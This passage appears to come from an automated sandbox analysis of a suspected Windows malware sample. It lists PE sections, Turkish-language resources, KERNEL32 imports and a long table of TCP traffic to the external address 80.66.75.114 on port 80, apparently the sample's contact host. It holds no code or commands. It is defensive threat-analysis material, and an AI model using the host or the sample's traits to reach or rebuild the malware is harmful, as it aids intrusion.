                                                            .tls0x1090000x51d0x600d00a0884dfc2593613905d91d2ea3f37False0.015625data0.007830200398677895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .wokeva0x10a0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x10b0000x1d3480x1d4004aa5b0a14a2e288b4c7948fe6ea66253False0.6008279914529915data6.057342974563368IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_CURSOR0x1235580x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                            RT_ICON0x10ba300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5711620469083155
                                                            RT_ICON0x10c8d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.641245487364621
                                                            RT_ICON0x10d1800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6941244239631337
                                                            RT_ICON0x10d8480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7514450867052023
                                                            RT_ICON0x10ddb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5196058091286307
                                                            RT_ICON0x1103580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.62406191369606
                                                            RT_ICON0x1114000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6311475409836066
                                                            RT_ICON0x111d880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7659574468085106
                                                            RT_ICON0x1122680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.8073027718550106
                                                            RT_ICON0x1131100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.7757220216606499
                                                            RT_ICON0x1139b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.7309907834101382
                                                            RT_ICON0x1140800x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7326589595375722
                                                            RT_ICON0x1145e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.683195020746888
                                                            RT_ICON0x116b900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.7340525328330206
                                                            RT_ICON0x117c380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.7688524590163934
                                                            RT_ICON0x1185c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.800531914893617
                                                            RT_ICON0x118aa00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39792110874200426
                                                            RT_ICON0x1199480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5591155234657039
                                                            RT_ICON0x11a1f00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6169354838709677
                                                            RT_ICON0x11a8b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6416184971098265
                                                            RT_ICON0x11ae200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.43550656660412757
                                                            RT_ICON0x11bec80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.42991803278688523
                                                            RT_ICON0x11c8500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.47606382978723405
                                                            RT_ICON0x11cd200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.8073027718550106
                                                            RT_ICON0x11dbc80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.7757220216606499
                                                            RT_ICON0x11e4700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.7309907834101382
                                                            RT_ICON0x11eb380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7326589595375722
                                                            RT_ICON0x11f0a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.683195020746888
                                                            RT_ICON0x1216480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.7340525328330206
                                                            RT_ICON0x1226f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.7688524590163934
                                                            RT_ICON0x1230780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.800531914893617
                                                            RT_STRING0x1238600x476data0.44921190893169877
                                                            RT_STRING0x123cd80x504data0.45794392523364486
                                                            RT_STRING0x1241e00x6b4data0.4324009324009324
                                                            RT_STRING0x1248980x760data0.4253177966101695
                                                            RT_STRING0x124ff80x706data0.42880978865406005
                                                            RT_STRING0x1257000x8b8data0.4211469534050179
                                                            RT_STRING0x125fb80x6d2data0.4306987399770905
                                                            RT_STRING0x1266900x4a4data0.46380471380471383
                                                            RT_STRING0x126b380x62edata0.4361567635903919
                                                            RT_STRING0x1271680x520data0.45198170731707316
                                                            RT_STRING0x1276880x722data0.4244249726177437
                                                            RT_STRING0x127db00x564data0.4391304347826087
                                                            RT_STRING0x1283180x2edata0.6304347826086957
                                                            RT_GROUP_CURSOR0x1236880x14data1.15
                                                            RT_GROUP_ICON0x118a280x76dataTurkishTurkey0.6694915254237288
                                                            RT_GROUP_ICON0x1234e00x76dataTurkishTurkey0.6694915254237288
                                                            RT_GROUP_ICON0x1121f00x76dataTurkishTurkey0.6610169491525424
                                                            RT_GROUP_ICON0x11ccb80x68dataTurkishTurkey0.7211538461538461
                                                            RT_VERSION0x1236a00x1bcdata0.581081081081081

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllSearchPathW, WriteConsoleOutputCharacterA, GetCommState, ReadConsoleA, InterlockedDecrement, QueryDosDeviceA, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, ConnectNamedPipe, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, LoadLibraryW, GetConsoleMode, CopyFileW, ReadConsoleOutputW, GetConsoleAliasExesLengthW, FormatMessageW, GetSystemTimeAdjustment, DeleteVolumeMountPointW, HeapDestroy, GetFileAttributesW, GetBinaryTypeA, ReleaseSemaphore, GetShortPathNameA, GetLastError, GetLongPathNameW, GetProcAddress, SetStdHandle, BuildCommDCBW, GetNumaHighestNodeNumber, ResetEvent, LoadLibraryA, LocalAlloc, SetCalendarInfoW, FindAtomA, GetModuleFileNameA, GetDefaultCommConfigA, FatalAppExitA, GlobalReAlloc, GetVolumeInformationW, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
                                                            USER32.dllSetFocus

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            TurkishTurkey

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 8, 2024 10:08:09.336158991 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:09.341270924 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:09.341347933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:09.341484070 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:09.346395016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.086735010 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.086962938 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.121747017 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.126826048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.378456116 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.378681898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.383874893 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.388843060 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.622387886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.622454882 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.630323887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.635227919 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.876530886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.876602888 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.876605034 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.876651049 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.876666069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.876676083 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.876687050 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.876718998 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.876718998 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.876756907 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.876769066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.876779079 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.876790047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.876799107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.876820087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.876820087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.876852989 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.877194881 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.877207041 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.877217054 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.877248049 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.877279997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.881633043 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.881695986 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:10.881712914 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:10.881820917 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.016545057 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.016632080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.016650915 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.016668081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.016702890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.016722918 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.016722918 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.016741991 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.016765118 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.016797066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.016882896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.016916037 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.016944885 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.016952038 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.016967058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.016987085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.017002106 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.017043114 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.151210070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.151248932 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.151284933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.151314974 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.151314974 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.151362896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.151403904 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.151433945 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.151446104 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.151496887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.151498079 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.151532888 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.151567936 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.151601076 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.151664972 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.151664972 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.151664972 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.151665926 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.152174950 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.152209044 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.152251005 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.152251959 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.152282953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.152317047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.152332067 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.152350903 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.152364016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.152384996 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.152388096 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.152421951 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.152431965 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.152468920 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.152939081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.152992964 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.152997971 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.153044939 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.153052092 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.153090000 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.153103113 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.153126001 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.153140068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.153188944 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.153409958 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.153462887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.153485060 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.153518915 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.153539896 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.153563023 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.153630972 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.153667927 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.153680086 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.153702021 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.153712988 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.153737068 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.153748989 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.153781891 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.154342890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.154395103 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.154395103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.154429913 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.154441118 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.154473066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.154629946 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.154663086 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.154683113 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.154696941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.154705048 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.154730082 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.154740095 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.154769897 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.242818117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.242831945 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.242842913 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.243038893 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.243038893 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.243055105 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.243134975 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286032915 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286077023 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286093950 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286109924 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286123991 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286139965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286154985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286173105 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286228895 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286228895 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286230087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286230087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286230087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286230087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286230087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286230087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286370039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286384106 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286400080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286413908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286423922 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286429882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286446095 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286453009 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286468983 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286474943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286495924 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286521912 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286736965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286752939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286788940 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286806107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286808968 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286822081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286837101 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286866903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286866903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286900997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.287198067 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.287224054 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.287240028 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.287250042 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.287265062 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.287276030 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.287276030 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.287318945 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.425695896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.425811052 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.425811052 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.425825119 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.425903082 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.425903082 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.445183039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.450366974 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.692985058 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.693078041 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:13.740324020 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:13.746249914 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:13.987679958 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:13.987761974 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:16.021287918 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:16.026304007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:16.262528896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:16.263030052 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:18.302316904 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:18.307243109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:18.550729036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:18.550919056 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:20.583638906 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:20.589128017 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:20.835737944 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:20.835807085 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:22.864959002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:22.870486975 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:23.123287916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:23.123426914 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:25.146970034 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:25.151943922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:25.395947933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:25.396051884 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:27.427881002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:27.433166981 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:27.661278009 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:27.661408901 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:29.693419933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:29.731981039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:29.976442099 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:29.976639032 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:32.015285969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:32.021162033 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:32.253798962 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:32.253902912 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:34.271671057 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:34.276679993 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:34.964449883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:34.964772940 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.037252903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.042449951 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298378944 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298403978 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298415899 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298420906 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298430920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298435926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298441887 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298446894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298451900 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298460007 CEST804973080.66.75.114192.168.2.4
